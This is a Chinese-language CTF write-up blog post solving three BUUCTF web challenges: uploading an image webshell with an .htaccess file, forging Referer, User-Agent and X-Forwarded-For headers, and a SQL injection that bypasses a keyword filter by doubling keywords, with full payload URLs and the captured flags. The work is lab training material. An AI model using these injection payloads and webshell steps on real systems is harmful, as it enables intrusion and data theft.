BUUCTF_WEB_20200918

WEB-你传nm呢

考点:文件上传

这次老铁没有按照顺序做,老铁的老铁跟老铁探讨这道文件上传题目,所以就先出这道的wp了,拿到题,应该是要上传一张图片马,上传我们准备好的图片马上传成功/var/www/html/upload/4df4e0ac9c99d68e34f7594bdfe51bd7/s.jpg succesfully uploaded!

接下来再上传我们的解析文件,上传成功/var/www/html/upload/4df4e0ac9c99d68e34f7594bdfe51bd7/.htaccess succesfully uploaded!

接下来连接蚁剑,连接成功,开始寻找flag

最后拿到flag

flag

flag{2c50dfd3-309c-4c61-a045-31e46e3a1db1}

WEB-http

考点

找了半天没什么突破口,F12一波发现有一个链接Secret.php

打开后是一个如下图的界面

尝试抓包,构造referer=https://www.Sycsercet

继续构造User-Agent=Syclover

要求本地,再对XFF头构造
x-forwarded-for=127.0.0.1

flag

flag{be6b4f94-af6c-46e9-b409-f4fd4197c6b5}

WEB-Babysql

考点:双写绕过注入

拿到熟悉的网站应该还是存在sql注入漏洞

尝试万能密码,还是返回错误

继续尝试union和select,依旧被过滤

继续尝试一下双写,结果提示列数不对可能有戏,最后得出列数为3

接下来我们爆破数据库http://9e7146ce-9127-4def-87c1-2f936b118f3c.node3.buuoj.cn/check.php?username=admin&password=admin%20%20ununioni

on%20seselectlect%201,2,database()%20%23,得到数据库名为geek

接下来爆破数据库ununionion seselectlect 1,2,group_concat(schema_name) frfromom (infoorrmation_schema.schemata) %23

接下来爆破表名 ununionion seselectlect 1,2,group_concat(table_name) frfromom(infoorrmation_schema.tables) whwhereere table_schema="ctf" %23

接下来爆破列名http://629035d3-6866-4fde-8521-7f52b6a60327.node3.buuoj.cn/check.php?username=admin&password=admin%27%20ununionion%20seselectlect%201,2,group_concat(flag)%20frfromom(ctf.Flag)%23找到了flag

flag

flag{11eab255-0048-4dc3-8ddf-cfec1ebea4ea}

posted @ 2020-09-18 21:41  WANGXIN_YU  阅读(177)  评论(0)    收藏  举报